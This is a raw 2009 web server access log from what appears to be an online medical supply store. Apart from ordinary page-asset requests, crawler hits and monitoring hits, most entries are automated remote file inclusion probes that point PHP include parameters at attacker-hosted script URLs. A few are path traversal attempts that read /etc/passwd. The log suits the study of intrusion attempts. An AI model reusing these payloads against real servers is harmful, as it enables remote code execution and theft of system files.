202.21.134.11 - - [07/May/2009:23:22:43 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:43 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:43 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:43 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:44 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:44 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:44 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:45 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:45 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:45 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:45 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:46 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:46 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:46 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:46 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:47 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:47 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:47 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:47 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:48 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
202.21.134.11 - - [07/May/2009:23:22:48 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):86" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
122.153.212.195 - - [07/May/2009:23:24:31 -0400] "GET /logs/access_log.Q108061500%20%20/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:24:31 -0400] "GET /logs/access_log.Q109042200%20%20/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:24:47 -0400] "GET /logs/access_log.Q109042200/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:24:47 -0400] "GET /logs/access_log.Q108061500/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
72.30.142.94 - - [07/May/2009:23:24:52 -0400] "GET /logs/access_log.Q108092300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [07/May/2009:23:25:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.199.222.19 - - [07/May/2009:23:25:58 -0400] "GET /logs/access_log.Q109012500/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:23:25:58 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:23:25:58 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.201.76.150 - - [07/May/2009:23:25:59 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
122.201.76.150 - - [07/May/2009:23:25:59 -0400] "GET /logs/access_log.Q109012500/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
122.201.76.150 - - [07/May/2009:23:25:59 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:23:26:06 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:23:26:06 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:23:26:06 -0400] "GET /logs/access_log.Q109012500%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
122.201.76.150 - - [07/May/2009:23:26:14 -0400] "GET /logs/access_log.Q109012500%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
122.201.76.150 - - [07/May/2009:23:26:14 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.201.76.150 - - [07/May/2009:23:26:14 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:23:28:09 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:23:28:09 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.811"
58.227.193.198 - - [07/May/2009:23:28:10 -0400] "GET /index.inc.php?PATH_Includes=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:23:28:10 -0400] "GET /logs/index.inc.php?PATH_Includes=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:23:28:10 -0400] "GET /logs/access_log.Q109021500/index.inc.php?PATH_Includes=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:23:28:16 -0400] "GET /logs/error_log.Q109021500/index.inc.php?PATH_Includes=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:23:28:22 -0400] "GET /logs/access_log.Q109013100%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
122.201.76.150 - - [07/May/2009:23:28:26 -0400] "GET /logs/access_log.Q109013100%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
222.239.76.25 - - [07/May/2009:23:28:27 -0400] "GET /logs/index.inc.php?PATH_Includes=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.239.76.25 - - [07/May/2009:23:28:27 -0400] "GET /index.inc.php?PATH_Includes=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
222.239.76.25 - - [07/May/2009:23:28:27 -0400] "GET /logs/access_log.Q109021500%20%20/index.inc.php?PATH_Includes=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.15.206.26 - - [07/May/2009:23:28:28 -0400] "GET /logs/access_log.Q109010400/?config[root_dir]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
67.15.206.26 - - [07/May/2009:23:28:29 -0400] "GET /?config[root_dir]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.65"
67.15.206.26 - - [07/May/2009:23:28:29 -0400] "GET /logs/?config[root_dir]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 200 346 "-" "libwww-perl/5.65"
67.15.206.26 - - [07/May/2009:23:28:32 -0400] "GET /logs/access_log.Q109032900/?config[root_dir]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
222.239.76.25 - - [07/May/2009:23:28:34 -0400] "GET /logs/error_log.Q109021500%20%20/index.inc.php?PATH_Includes=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:28:44 -0400] "GET /logs/access_log.Q109020400/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:23:28:48 -0400] "GET /logs/error_log.Q109021500%20%20/index.inc.php?PATH_Includes=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:23:28:48 -0400] "GET /logs/access_log.Q109021500%20%20/index.inc.php?PATH_Includes=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.30.142.94 - - [07/May/2009:23:28:58 -0400] "GET /logs/access_log.Q107080500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.59.11.66 - - [07/May/2009:23:29:21 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
122.201.76.150 - - [07/May/2009:23:29:25 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
122.201.76.150 - - [07/May/2009:23:29:25 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
122.201.76.150 - - [07/May/2009:23:29:25 -0400] "GET /logs/access_log.Q109013100/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:23:29:26 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.811"
222.239.76.25 - - [07/May/2009:23:29:51 -0400] "GET /logs/access_log.Q109021500/index.inc.php?PATH_Includes=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.239.76.25 - - [07/May/2009:23:29:51 -0400] "GET /logs/error_log.Q109021500/index.inc.php?PATH_Includes=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:23:29:56 -0400] "GET /logs/access_log.Q109020400/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [07/May/2009:23:30:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.199.222.19 - - [07/May/2009:23:30:16 -0400] "GET /logs/access_log.Q109013100/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:23:30:16 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:23:30:16 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
194.246.101.99 - - [07/May/2009:23:32:55 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../etc/passwd HTTP/1.0" 404 233 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
194.246.101.99 - - [07/May/2009:23:32:55 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../etc/passwd HTTP/1.0" 404 238 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
194.246.101.99 - - [07/May/2009:23:32:55 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rabika.ru/hk? HTTP/1.0" 404 232 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
194.246.101.99 - - [07/May/2009:23:32:55 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rabika.ru/hk? HTTP/1.0" 404 237 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
72.32.210.206 - - [07/May/2009:23:33:29 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.32.210.206 - - [07/May/2009:23:33:29 -0400] "GET /logs/access_log.Q108062800///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.32.210.206 - - [07/May/2009:23:33:29 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.32.210.206 - - [07/May/2009:23:33:35 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.32.210.206 - - [07/May/2009:23:33:35 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.32.210.206 - - [07/May/2009:23:33:35 -0400] "GET /logs/access_log.Q108062800///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.32.210.206 - - [07/May/2009:23:33:41 -0400] "GET /logs/access_log.Q108071200///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.32.210.206 - - [07/May/2009:23:33:43 -0400] "GET /logs/access_log.Q108071200///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.30.142.94 - - [07/May/2009:23:33:59 -0400] "GET /logs/access_log.Q108021300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.17 - - [07/May/2009:23:34:08 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
77.221.130.17 - - [07/May/2009:23:34:08 -0400] "GET /logs/access_log.Q108092600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
77.221.130.17 - - [07/May/2009:23:34:08 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
66.249.72.114 - - [07/May/2009:23:34:43 -0400] "GET /images/GoOver.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
66.249.72.114 - - [07/May/2009:23:34:44 -0400] "GET /logs/access_log.Q108022800 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.17 - - [07/May/2009:23:34:48 -0400] "GET /logs/access_log.Q108100500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
69.89.31.105 - - [07/May/2009:23:34:50 -0400] "GET /logs/access_log.Q109042600//skin/zero_vote/error.php?dir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
69.89.31.105 - - [07/May/2009:23:34:51 -0400] "GET //skin/zero_vote/error.php?dir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.812"
69.89.31.105 - - [07/May/2009:23:34:51 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.812"
72.30.142.94 - - [07/May/2009:23:34:53 -0400] "GET /images/_notes/circle_CD_off.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [07/May/2009:23:35:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.84.128.40 - - [07/May/2009:23:35:09 -0400] "GET /logs/access_log.Q109042600//skin/zero_vote/error.php?dir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
88.84.128.40 - - [07/May/2009:23:35:10 -0400] "GET //skin/zero_vote/error.php?dir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.803"
88.84.128.40 - - [07/May/2009:23:35:10 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
62.116.168.108 - - [07/May/2009:23:35:30 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:23:35:30 -0400] "GET /logs/access_log.Q108062800///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:23:35:30 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:23:35:47 -0400] "GET /logs/access_log.Q108071200///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.73.188.28 - - [07/May/2009:23:36:10 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.73.188.28 - - [07/May/2009:23:36:10 -0400] "GET /logs/access_log.Q108062800///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.73.188.28 - - [07/May/2009:23:36:10 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.73.188.28 - - [07/May/2009:23:36:23 -0400] "GET /logs/access_log.Q108071200///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
